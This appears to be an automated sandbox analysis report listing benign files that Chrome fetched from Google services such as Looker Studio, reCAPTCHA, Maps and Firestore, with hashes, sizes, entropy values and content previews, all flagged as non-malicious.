                                                          SHA-512:10D8857DBD6BA1ECCE772ACCEA7B93872D8D09BB90B23D84082D8A4AFB874B90496B6A4248A295D75B527254F798CF36C6326936E234116B8C442E693C352E14
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://content-sheets.googleapis.com/static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.lb.en.5oZHy0SiJxw.O%2Fd%3D1%2Frs%3DAHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA%2Fm%3D__features__
                                                          Preview:<!DOCTYPE html>.<html>.<head>.<title></title>.<meta http-equiv="X-UA-Compatible" content="IE=edge" />.<script type="text/javascript" nonce="kxknhy-z6VAsuNs0UFMrYQ">. window['startup'] = function() {. googleapis.server.init();. };.</script>.<script type="text/javascript". src="https://apis.google.com/js/googleapis.proxy.js?onload=startup" async. defer nonce="kxknhy-z6VAsuNs0UFMrYQ"></script>.</head>.<body>.</body>.</html>.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (2049)
                                                          Category:downloaded
                                                          Size (bytes):14478
                                                          Entropy (8bit):5.470419549912619
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:263CF9F30D9F68BF1646B6D14661ACD2
                                                          SHA1:F3FD7E3D7B101073958C98B951585E9750D029AC
                                                          SHA-256:55443D49F2E31F1E44921492A28CCD4FB52D5E46ACC2CE4E3141783928662FB3
                                                          SHA-512:7A81ECCB0AB522574C7DB53FC7E46E159798C89C1BF7A7347FEA84D2ED84CBC765950479629BDAAEADEB6CCAD595C080D8CB34E96A0A463C0EEE01F7BFB0B447
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://apis.google.com/js/googleapis.proxy.js?onload=startup
                                                          Preview:(function(){var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},ca=ba(this),g=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-.1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}},h=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regular expression");return a+""};.g("String.prototype.endsWith",function(a){return a?a:function(b,c){var d=h(this
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                          Category:dropped
                                                          Size (bytes):116362
                                                          Entropy (8bit):7.997473195483862
                                                          Encrypted:true
                                                          SSDEEP:
                                                          MD5:81C7B985343C317ADEEA2C28F5C6FF4D
                                                          SHA1:7A04D6215D0B79EEDE6823C4B3621795AD552534
                                                          SHA-256:6BDBA6F0D2271DD20E6E6AEA2B459A1A23050EDE1B3BBADE4C913A1716F6E491
                                                          SHA-512:DDF40137ED7F870C5E7475685BA9006F9C99C7C0632A9E7738DCF9BD081C105ABA5B94B3302BBD26DFF413DC065FC442D3CDDA33684709D6185B409F08158085
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...........k{.H.(.}.......c....8=.Ib......#Ca.....K..o..ZU%...q..9...ct).....S..*?U.6..rqyt~Y9}W..........Z.xzy..x.z.Q.w9......^...U.........<..G....=wZ.....Oxe.._.0.*S/..k>..*&T..*gn.?TN....6.....a0...I\......)....$......7.T>x.0..q\...{..H...|.....2..x"..\`IYkD..#*....FP....a.^.].'0h.&.....ie..|.*qPy....l<..S.y.E..>.....a...3..-vq:..P<..dE.....C.h.P..]..\5.......3.<N.^?T...:B#c....|...T.........(...Q.l7[...V.e.W.8.G.....O...0.m...f.F...7..h.......F..b...Yr.=...f.....?......S.}U..g.......t..../...G.......~.+...)y.X\...<.&.........`.v.....`^....c4c.Yh=.a.wB.m.......i..~v-..O..nY....A....5...v...t..FSw...Q/n...c.9Y{.-..>a..7h..o..ec...O...)~..8...j-M..nD....9......f5..'Q#...L.'......fZW."Q[.<.nx..O...LU.;..a.m..&.k.$...;.=L...yv....,.f<Hb{.w.@.8...8F.D.>.04.[K6v.i..2.#?..&.;-.].....1.X0w.H6mZ..A...t..e-.\...MC6.xt`..cu...@_...v....;z'.mV.T/o.i....-...K......\..Sn>B......%x..%......W.|......~.6.%...+.:..x5..s5P.-..!.G...ZT.i...;.&
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (707)
                                                          Category:downloaded
                                                          Size (bytes):557951
                                                          Entropy (8bit):5.647875359913788
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:82D2864FBB453E7C84420475048B4871
                                                          SHA1:8CC1E213FEBE46EAD348897B57003ADF01D2F363
                                                          SHA-256:99A3E3D176A4CDD361B91E2BD52ED9834307C42296E8009A92780E5F0970ACB4
                                                          SHA-512:3CF9191966D1D381F4E1A775D25A9A25F5E8EA42F024293E07DBFF94FA5CDA002D2BE04BF8FAD76511DCB185E855A136923DC07F088B766FB120B20A9EEA891A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://www.gstatic.com/recaptcha/releases/IyZ984yGrXrBd6ihLOYGwy9X/recaptcha__en.js
                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var Q=function(){return[function(h,e,a,l,A,E,g){if((h-(g=[32,8,3],5)^18)<h&&(h-4^g[0])>=h){for(l=e,A=[];l<a;l++)A[l]=e;E=A}return(h-g[1]|13)<h&&(h-g[2]|7)>=h&&(this.S=e),E},function(h,e,a,l,A,E,g,W,c){return h+8>>(((((h<<2&(W=["sC",4,10],15))>=6&&(h^73)>>W[1]<W[1]&&(c=P[W[2]](11)?AV.platform==="Android":K[19](93,"Android")),h)+7&29)>=h&&h-8<<1<h&&y.call(this,e,0,"patresp"),(h|48)==h)&&(c="https://play.google.com/log?format=json&hasfast=true"),2)<h&&(h+2&59)>=h&&(E=(new QW(1453,"0")).bi(),E.Y1||(E.Y1=.new w6),g=new jT({pl:E.pl,Df:E.Df?E.Df:Q[24].bind(null,2),vP:E.vP,wV:"https://play.google.com/log?format=json&hasfa
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text
                                                          Category:downloaded
                                                          Size (bytes):438
                                                          Entropy (8bit):5.039813173321196
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:D52C3D4F62E1B7E632EAC775429CA333
                                                          SHA1:285FFF65A99E12143752C9413634922AEB8528D4
                                                          SHA-256:7054739EB88B7570B7D89323253F9690210ED1E6FBE92D6FD601C1A83066A03D
                                                          SHA-512:EDC6B8B3D3A3D28843C9B8B8BDE2F330CC3B6FA8065D56E5EEC76D44F2B9C6C1374FEA36AB909B4C24FBAAEC6C547C1AD923C769CBDEB891CF75350C79837A69
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://firestore.googleapis.com/google.firestore.v1.Firestore/Write/channel?gsessionid=S81UA0okWSB4aF9VMcT7Q5CYSdHTIibi_bU-w6uuex8&VER=8&database=projects%2Fdatastudio-prod-firestore%2Fdatabases%2F(default)&RID=rpc&SID=mDm2wKtWM4eG7UkV_g_BZw&AID=0&CI=0&TYPE=xmlhttp&zx=c339ocz1gkb7&t=1
                                                          Preview:63.[[1,[{. "streamId": "0",. "streamToken": "GRBoQgKB9LW1".}.]]]182.[[2,[{. "streamToken": "EAEZEGhCAoH0tbU=",. "writeResults": [. {. "updateTime": "2025-02-25T18:02:40.344620Z". }. ],. "commitTime": "2025-02-25T18:02:40.344620Z".}.]]]182.[[3,[{. "streamToken": "EAIZEGhCAoH0tbU=",. "writeResults": [. {. "updateTime": "2025-02-25T18:02:40.401116Z". }. ],. "commitTime": "2025-02-25T18:02:40.401116Z".}.]]]
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text
                                                          Category:downloaded
                                                          Size (bytes):675
                                                          Entropy (8bit):4.973107404946163
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:0327547E5DAE8AD528F121B2090FE5AC
                                                          SHA1:A41CCA666D290B79B6DA4F6E666FB5ABB5D107D0
                                                          SHA-256:49520562FB202941CEC187B688E42504E52DDF192DE6B4B6073F61A085F51687
                                                          SHA-512:CC834EC54E0325679CECEAEC0DA0D2D2B234E95F39C5D921262B315A92265F3293356A64FD915213F58DFF53CF9D899745CE2E28BEE9657934DD8D93295D7E65
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://firestore.googleapis.com/google.firestore.v1.Firestore/Listen/channel?gsessionid=0eMNjqZE2aeesM7eqWtNa6yTcqgUDP5UEjnQ5cKVhss&VER=8&database=projects%2Fdatastudio-prod-firestore%2Fdatabases%2F(default)&RID=rpc&SID=r1fr_66omoSAissrZgNRkA&AID=0&CI=0&TYPE=xmlhttp&zx=fq3zpmoewhgf&t=1
                                                          Preview:529.[[1,[{. "targetChange": {. "targetChangeType": "ADD",. "targetIds": [. 2. ]. }.}.]],[2,[{. "targetChange": {. "resumeToken": "CgkIptyamrTfiwM=",. "readTime": "2025-02-25T18:02:40.638502Z". }.}.]],[3,[{. "targetChange": {. "targetChangeType": "CURRENT",. "targetIds": [. 2. ],. "resumeToken": "CgkIsMH8nLTfiwM=",. "readTime": "2025-02-25T18:02:46.434992Z". }.}.]],[4,[{. "targetChange": {. "resumeToken": "CgkIsMH8nLTfiwM=",. "readTime": "2025-02-25T18:02:46.434992Z". }.}.]]]14.[[5,["noop"]]]121.[[6,[{. "targetChange": {. "resumeToken": "CgkIhoqms7TfiwM=",. "readTime": "2025-02-25T18:03:33.253382Z". }.}.]]]
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                                          Category:dropped
                                                          Size (bytes):1623
                                                          Entropy (8bit):5.3277524463064365
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:A16DA40C9E1B5EC46C102E7CEF69051A
                                                          SHA1:C4402BFF0387FDEE5D4AE00364DD7E3A986D7206
                                                          SHA-256:02037C89AC0173E3681C52495A25F3BD1800A013340F69A8AD6B2EF873D86E22
                                                          SHA-512:2ADD0F7A3A882023AE16687E7CF23D251C246D3CF1EC8590009CE2238BFCCA192D6F45292E6B063FFA0BDD17BC81F59FD102EBAD0B9B452FE2E39C5452FA9BC6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 404 (Not Found)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                                          Category:dropped
                                                          Size (bytes):1555
                                                          Entropy (8bit):5.249530958699059
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:FBE36EB2EECF1B90451A3A72701E49D2
                                                          SHA1:AE56EA57C52D1153CEC33CEF91CF935D2D3AF14D
                                                          SHA-256:E8F2DED5D74C0EE5F427A20B6715E65BC79ED5C4FC67FB00D89005515C8EFE63
                                                          SHA-512:7B1FD6CF34C26AF2436AF61A1DE16C9DBFB4C43579A9499F4852A7848F873BAC15BEEEA6124CF17F46A9F5DD632162364E0EC120ACA5F65E7C5615FF178A248F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 400 (Bad Request)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//ww
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 11970
                                                          Category:downloaded
                                                          Size (bytes):4880
                                                          Entropy (8bit):7.966397036823352
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:03C76051E45F8BAFD592731BA31E82BB
                                                          SHA1:58F5464CCAB2D8096ABCA4E4324DE38B7C4B829E
                                                          SHA-256:F8D8EEB949623360942057B5ABDB018AC7AEDE91092961BA52A417F4C64700A7
                                                          SHA-512:253A9F9D5F59AEC12DF2B69AB71414F6EA76EBD5464C66DD107347E20E303610BC371764EEFCBEC3FA031CC03A30C556486AD9DD833A2B6FAAA3714BDC2DDA95
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/frameworksupport.min_oadrnc13magb009k4d20lg2.js
                                                          Preview:...........Z{s..._..Fs.2.(9..RX..;[.m..LoWR2..JL)R....K.}...ERV...lfb.yp....'...........;..~:.8a.....=.:{}..pZ..E..(N...u....R.I...L.2.*..%..8LX$.%S..V2.$.*gI.+l..Iv....3.....s}v.....q...lu..B.4S.T.0.ih.:i.X..d7.x.`..S..Y...S...!y.......`.P,.Z.<|vI+-.\.cN..r .9..`..._..g....'K.;...........e...'N..|[........Y1U~..\..b....%....w&nWX.'wl..X^....s).R.....z}.....h.<&r..V"!.j.7q.|.j.'.S..O.O9s...^vz/:.#.&.J..~.;......;.y..@z.;.u.yy...)..?......'..l..i.........>.........s......[h...].^^.....v....NO|...._...._.._......[..)is:}{..5..{.m......n%...{......7....hw.{^@.s%c....,r.{/.*d.....x[..f..D..s.....1_..G.[.....A...E>.W.u"|.Q.A.n.....+l.>...b..S..Tt....z.,..Gb20'q",..d...>....vx..@.?]..u6............9...y.n.6..k\.U..#..)...R/.b...`...<P.M~.......K.l1...Vm.xX..A............Oa...cq.......[1....@O...Z..d....X..-Gr..UI...,KD....r.v.Yii..s..Z`vl0.F...*..Q....Gf.;.2.....\...X*#..r...*..Q.=L...D.s..d...W.@..#....I@....zmO..fA.g.v.&.......M....,N....
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (10345)
                                                          Category:dropped
                                                          Size (bytes):277574
                                                          Entropy (8bit):5.418264212751306
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:25FC9D6722CD826315566461EFD35C94
                                                          SHA1:B2725B6C1169FDC2645A716E4DAF6A70F587FBBF
                                                          SHA-256:C0F90CC819DB81F20A11BD886BECBF7F353231FCA5B7CA097D414998FADCCCB3
                                                          SHA-512:B494026300A8F9D8C030BB4D8A67F2A05182D914C7FD6DAB963872C66AE8A92ED699F934808F5F6B8AF471FA5824E78B9DEDE004289F3686526A8A016184EDF1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:google.maps.__gjsload__('common', function(_){var $ja,Zja,bka,cka,lka,Ar,vka,wka,zka,Fr,Aka,Gr,Bka,Hr,Cka,Ir,Lr,Nr,Eka,Fka,Ika,Jka,Lka,Bs,Nka,Pka,Qka,Ms,Uka,Vka,tt,dla,fla,ela,jla,kla,Ut,nla,ola,pla,Zt,eu,ula,fu,iu,vla,ju,wla,mu,Bla,Cla,uu,Dla,Ela,vma,wma,Uma,Yma,Zma,$ma,ana,bna,Rw,fna,Sw,gna,hna,jna,lna,kna,nna,mna,ina,ona,qna,sna,Ana,Ena,Fna,Ona,Mna,mx,nx,Qna,Rna,Sna,Tna,Jq,Iq,Una,fka,Wna,Xna,Vw,Ww,pna,Uw,nw,ika,Yna,kka,jka,tna,pka,Zna,coa,ska,uka,hoa,Iv,koa,loa,Rka,Gs;.$ja=function(a){const b=[];let c=a.length;var d=a[c-1];let e;if(_.Kg(d)){c--;e={};var f=0;for(const g in d)d[g]!=null&&(e[g]=Zja(d[g],a,g),f++);f||(e=void 0)}for(d=0;d<c;d++)f=a[d],f!=null&&(b[d]=Zja(f,a,d+1));e&&b.push(e);return b};Zja=function(a,b,c){a instanceof _.$g&&(a=a.Sl(b,+c));return Array.isArray(a)?$ja(a):typeof a==="boolean"?a?1:0:typeof a==="number"?isNaN(a)||a===Infinity||a===-Infinity?String(a):a:a instanceof Uint8Array?_.ec(a):a instanceof _.kc?_.qc(a):a instanceof _.Ve?a.Hh():a};._.Bq=function(a){retu
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):500243
                                                          Entropy (8bit):4.823028612584816
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:BA92CE5D7F83E6A15D6DE345C0AC4480
                                                          SHA1:A54107E2973C94C0B44786E0F602C46EA0E854FA
                                                          SHA-256:A4DC02F68D1314A260A71400AA02A9525416A0F9335F4273CC5A69EF91D53D15
                                                          SHA-512:801A8691B67913F30AB0C949A55AB2707064C0094B81CF6550C564DA85CFCD5F4DF7A9B6ABA8F1EA99BD08487CFF555904FAD66A986E7BB80727A41E33199196
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://ssl.gstatic.com/datastudio/cloud-lego-fe.fe-server_20250210.00_p7/css/material_theme.css?cb=729158798
                                                          Preview:.reach-panel-layout-content-wrapper{overflow:hidden}.xap-avatar-button.xap-avatar-button{-webkit-box-align:center;-webkit-align-items:center;-moz-box-align:center;-ms-flex-align:center;align-items:center;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.xap-avatar{border-radius:50%}.xap-avatar-monogram{border-radius:50%;font-size:14px;font-weight:500;line-height:18px;font-family:Google Sans,Helvetica Neue,sans-serif;letter-spacing:.25px;-webkit-box-align:center;-webkit-align-items:center;-moz-box-align:center;-ms-flex-align:center;align-items:center;background-color:#1a73e8;color:#fff;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.xap-account-menu-layout{width:352p
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):186
                                                          Entropy (8bit):4.954830863421278
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:34D0C1CC70EB6CD64E88E580E9B927D3
                                                          SHA1:FCAE69E97BBEC0F19C644138953632C49A3AD736
                                                          SHA-256:D207EB837BA52BFD8FB4CD0EE7B31B3E98EAB0A0929DDE781AF8D7CBA9CEA13F
                                                          SHA-512:EBB66DE369E4BE4B7F4E775007C66687CCEDA16F10A14A26396C15CE888FA3255872230CF2FB31D9A58A52E416E7B6AC906078DACE033C5AC6DB386130A62FE9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://www.gstatic.com/images/icons/material/system_gm/svg/filter_list_24px.svg
                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 0 24 24" width="24"><path d="M0 0h24v24H0V0z" fill="none"/><path d="M10 18h4v-2h-4v2zM3 6v2h18V6H3zm3 7h12v-2H6v2z"/></svg>
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 342 x 72, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):5139
                                                          Entropy (8bit):7.865234009830226
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:8B36337037CFF88C3DF203BB73D58E41
                                                          SHA1:1ADA36FA207B8B96B2A5F55078BFE2A97ACEAD0E
                                                          SHA-256:E4E1E65871749D18AEA150643C07E0AAB2057DA057C6C57EC1C3C43580E1C898
                                                          SHA-512:97D8CC97C4577631D8D58C0D9276EE55E4B80128080220F77E01E45385C20FE55D208122A8DFA5DADCB87543B1BC291B98DBBA44E8A2BA90D17C638C15D48793
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.PNG........IHDR...V...H.............tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Macintosh)" xmpMM:InstanceID="xmp.iid:DB120779422011EA9888910153D3A5E6" xmpMM:DocumentID="xmp.did:DB12077A422011EA9888910153D3A5E6"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DB120777422011EA9888910153D3A5E6" stRef:documentID="xmp.did:DB120778422011EA9888910153D3A5E6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>P.WI....IDATx..]]l.......(.5.K0P..0...E.qT..J X)F.(5X....J.}(m.R5.Q...RUEUPU~.....qp@.b......L...k.m"0......"c.3
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                                          Category:dropped
                                                          Size (bytes):1638
                                                          Entropy (8bit):5.335980304615512
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:7AB8057A728638F282C51E9065465A80
                                                          SHA1:D479A4D4C280EA2845940C2CBC5AD82D25E02757
                                                          SHA-256:1ADF3775EDA464A3E32C7AD91B5BEDC212C004C56B847D44BECA907E407B3634
                                                          SHA-512:59896B64075CE9B61390A21F573B168BE3D92155C3905A3E054B310381F8B8A5EF6E8A4C78F175561B9CDADEA15930D21F6A5C9E42484F144EAF71EABB3BCB35
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 404 (Not Found)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (1572)
                                                          Category:downloaded
                                                          Size (bytes):274490
                                                          Entropy (8bit):5.533561655426582
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:F03DAA1603F444220F927BCF0A9F5C71
                                                          SHA1:3BD7F24DC2BF33ACBDB3F2BF39B3A38181882391
                                                          SHA-256:5EC4529E0467AB3CCBDBED552B1533B555ADA8D288A3A75E237BB5D87DA1DC7F
                                                          SHA-512:76A198684ECBA08ED7CE89F44BD2D8D63F3C69AD7DABB793173F2B7CF5C2C44658FEDC215326202080D9334451357089EE7EE0DC3AD8D0EBD2BDBF234CB0254F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:"https://fonts.googleapis.com/css?family=Droid+Sans:400italic,700italic,400,700,500|Syncopate:400italic,700italic,400,700,500|Impact:400italic,700italic,400,700|Ubuntu:400italic,700italic,400,700|Ubuntu+Mono:400italic,700italic,400,700|Open+Sans:400italic,700italic,300,400,600,700|Lato:400italic,700italic,400,700|Oswald:400italic,700italic,400,700|Lora:400italic,700italic,400,700,500|Roboto_old:400italic,700italic,500italic,400,700,300,500|Roboto+Condensed:400italic,700italic,400,700,500|Roboto2:400,300|Montserrat:400italic,700italic,400,700,500|Quicksand:400italic,700italic,400,700,500|Chewy:400italic,700italic,400,700,500|Indie+Flower:400italic,700italic,400,700,500|Orbitron:400italic,700italic,400,700,500|Cambria:400italic,700italic,400,700,500|Consolas:400italic,700italic,400,700,500|userbri:400italic,700italic,400,700|Corsiva:400italic,700italic,400,700,500|Tahoma:400italic,700italic,400,700,500|Trebuchet+MS:400italic,700italic,400,700,500|Boogaloo|Bubblegum+Sans|Coming+Soon|Cormorant+Unicase:400,700|Oleo+Script:400,700|Permanent+Marker|Raleway:400,400i,700,700i|Reenie+Beanie|Eater|Great+Vibes|Google+Sans:400italic,700italic,400,700,500|Product+Sans:400|Google+Material+Icons:400,500,700|Google+Sans+Text:400italic,700italic,400,700,500|Google+Sans+Mono"
                                                          Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */./* latin */.@font-face {. font-family: 'Boogaloo';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/boogaloo/v23/kmK-Zq45GAvOdnaW6y1C9ys.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'Bubblegum Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/bubblegumsans/v20/AYCSpXb_Z9EORv1M5QTjEzMEteaOxIL_bw.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Bubblegum Sans';. font-style: normal;. font-weight: 400;. src: url(http
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:dropped
                                                          Size (bytes):1814
                                                          Entropy (8bit):4.191702540548222
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:8030C81BBB9B80E55E54B1FC4CE1EBA8
                                                          SHA1:BAD358C2A4734DB79A99A5C7F9665F2276366D4A
                                                          SHA-256:355995015D94F26EFF134F7C53A942F1B6D2837A805BEA8B8691F3B6620B6ECF
                                                          SHA-512:EFDCE2D895FFDB9F26BAB8BF0F1CB1009EF94213D626358AAAED221F3F53767F37CB2F37C2F0095D257431B7D05FF1453F54556D180838111326469F56F08119
                                                          Malicious:false
                                                          Reputation:unknown
